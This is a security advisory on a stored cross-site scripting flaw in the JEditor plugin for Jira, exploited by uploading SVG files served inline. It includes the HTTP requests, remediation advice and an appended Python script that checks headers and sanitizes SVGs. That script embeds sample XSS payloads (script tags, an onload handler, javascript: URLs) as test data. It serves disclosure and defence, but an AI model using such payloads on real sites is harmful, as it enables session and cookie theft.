#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  JEditor plugin for Jira [1]
# Vendor:   Bobronix
# CSNC ID:  CSNC-2020-003
# Subject:  Stored Cross-Site Scripting (XSS)
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Lukasz D. (advisories@compass-security.com)
# Date:     23.06.2020
#
#############################################################

Introduction:
-------------
JEditor is the most powerful rich text editor for Jira. You can insert
screenshots, complex tables, tabs and also add code blocks and math. It
allows you to use built-in templates and styles or create your own.
JEditor renders a powerful, yet easy to use, rich text editor to simplify
your daily issue editing routine.

Despite its extensive input sanitization, which aims to prevent XSS
vulnerabilities, a certain functionality in JEditor can be abused to store
code that is executed in the browser of every user who views the affected
page.

Affected:
---------
The following versions of the JEditor plugin are vulnerable:

3.6.3 and possibly earlier versions

Technical Description:
----------------------
It is possible to attach images to messages created with JEditor. In
particular, one can attach SVG images that contain JavaScript.
Request sent while attaching an SVG image:

POST /plugins/servlet/jeditor_file_uploader?type=Images&atl_token= HTTP/1.1
Host: jira.example.com
Content-Type: multipart/form-data; boundary=---------------------------12345678
Cookie: atlassian.xsrf.token=; [CUT]
Connection: close

-----------------------------12345678
Content-Disposition: form-data; name="upload"; filename="xss.svg"
Content-Type: image/svg+xml

[SVG file body with embedded JavaScript; CUT]
-----------------------------12345678

The server answers with the link to the uploaded file:

https://jira.example.com/plugins/servlet/jeditor_file_provider?imgId=ckupload202005298301739482710384937&fileName=xss.svg

Upon accessing the link, the following response is received:

HTTP/1.1 200 [CUT]
X-Content-Type-Options: nosniff
Content-Disposition: inline; filename="xss.svg"
Content-Type: image/svg+xml;charset=UTF-8
Connection: close

The file is served from the Jira origin with Content-Disposition: inline
and a declared content type of image/svg+xml, so the browser (tested with
Chrome 81) renders it as an SVG document and executes the JavaScript it
contains in the context of the Jira application. X-Content-Type-Options:
nosniff does not prevent this, because the content type is declared rather
than sniffed.

To trigger the JavaScript execution when a message created with JEditor is
viewed, instead of having to lure the user into visiting the link directly,
the following string may be placed as message content in the JSON sent to
the server (an 'embed' tag wrapping the text 'xss' and pointing at the
file_provider link above; the tag markup was not preserved in this copy):

"[embed tag referencing the file_provider link above; markup not preserved]xss\n"

Note that, although 'embed' tags are not rendered in messages created with
JEditor, the linked SVG file will nevertheless be fetched and the payload
contained inside executed.

Workaround / Fix:
-----------------
Uploaded SVG files must either be sanitized before they are stored
(script elements, event-handler attributes and script-bearing URLs
removed), or not be served as inline documents, e.g. by returning them
with Content-Disposition: attachment instead of inline so that the browser
downloads the file rather than rendering it. Serving user-supplied files
from a separate origin that has no access to the Jira session would further
limit the impact of any remaining gap in the sanitizer.

Timeline:
---------
2020-05-29: Vulnerability discovered
2020-06-07: Patched version released
2020-06-23: Public disclosure

References:
-----------
[1]: https://marketplace.atlassian.com/apps/1210768/jeditor-rich-text-editor-for-jira
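Added example: checking and hardening SVG delivery
--------------------------------------------------
The following Python script is an added example and is not code from the
advisory, from Compass Security or from the vendor. It illustrates the two
points made in the Technical Description and in Workaround / Fix above: a
check that decides from a download endpoint's response headers whether a
served SVG would be rendered as a document in the Jira origin (the headers
shown above are reused as constructed test data), a header rewrite that
turns the response into a download, and a sanitizer that strips the
script-bearing constructs from an SVG before it is stored. The sample SVG
and all function names are assumptions made for this example; only the
Python standard library is used.

```python
"""Added example for the JEditor SVG advisory (not the vendor's or Compass's code).

Everything here is illustrative: the sample SVG, the header dictionary and
the function names are constructed for the example.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Elements that exist to run code or to embed foreign (HTML) markup.
DANGEROUS_TAGS = {"script", "foreignObject"}
# Attributes that carry a URL; a javascript:/data:/vbscript: scheme there is
# as good as a <script> element. data: is blocked wholesale, which also drops
# legitimate embedded raster images; relax this only with a strict allowlist.
URL_ATTRS = {"href", "{%s}href" % XLINK_NS}
SCHEME_RE = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.IGNORECASE)

# Constructed headers matching the vulnerable file_provider response above.
VULNERABLE_HEADERS = {
    "X-Content-Type-Options": "nosniff",
    "Content-Disposition": 'inline; filename="xss.svg"',
    "Content-Type": "image/svg+xml;charset=UTF-8",
}

# Constructed sample resembling xss.svg: scripted in four different ways.
SAMPLE_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.domain)">'
    "<script>alert(document.cookie)</script>"
    '<a xlink:href="javascript:alert(1)"><text x="10" y="20">xss</text></a>'
    '<foreignObject><body xmlns="http://www.w3.org/1999/xhtml" '
    'onmouseover="alert(2)"/></foreignObject>'
    "</svg>"
)


def svg_renders_inline(headers):
    """True if a browser would treat a response with these headers as an SVG
    document (and run its scripts): declared type image/svg+xml and no
    'attachment' disposition. nosniff is irrelevant; nothing is sniffed."""
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "image/svg+xml":
        return False
    disp = h.get("content-disposition", "inline").split(";")[0].strip().lower()
    return disp != "attachment"


def harden_headers(headers):
    """Return a copy of the headers that serves the same file as a download,
    keeping the original filename parameter if one was present."""
    out = dict(headers)
    old = out.get("Content-Disposition", "")
    params = old.split(";", 1)[1].strip() if ";" in old else ""
    out["Content-Disposition"] = "attachment" + ("; " + params if params else "")
    return out


def _local(name):
    """Strip the '{namespace}' prefix ElementTree puts on tags/attributes."""
    return name.rsplit("}", 1)[-1]


def sanitize_svg(svg):
    """Remove <script>, <foreignObject>, on* event handlers and script-bearing
    URLs, then re-serialise. This is a denylist covering the constructs the
    advisory's payload relies on; production code should use an element and
    attribute allowlist and a parser hardened against entity expansion
    (e.g. defusedxml) instead of plain ElementTree."""
    root = ET.fromstring(svg)
    if _local(root.tag) in DANGEROUS_TAGS:
        raise ValueError("root element is not allowed")
    # Collect first, then remove, so the tree is not mutated while iterating.
    doomed = [(p, c) for p in root.iter() for c in list(p)
              if _local(c.tag) in DANGEROUS_TAGS]
    for parent, child in doomed:
        parent.remove(child)
    for el in root.iter():
        for attr in list(el.attrib):
            if _local(attr).lower().startswith("on"):
                del el.attrib[attr]
            elif attr in URL_ATTRS and SCHEME_RE.match(el.attrib[attr]):
                del el.attrib[attr]
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    print("vulnerable headers render inline:", svg_renders_inline(VULNERABLE_HEADERS))
    print("hardened headers render inline:  ",
          svg_renders_inline(harden_headers(VULNERABLE_HEADERS)))
    print("sanitized:", sanitize_svg(SAMPLE_SVG))
```

Run the file directly to see the verdicts for the constructed data. The
header check is the quick test to run against any file download endpoint
during an assessment; the sanitizer is the fallback for deployments that
must keep rendering SVG inline, and its denylist nature is the reason the
advisory's first recommendation (do not serve as inline) is the stronger fix.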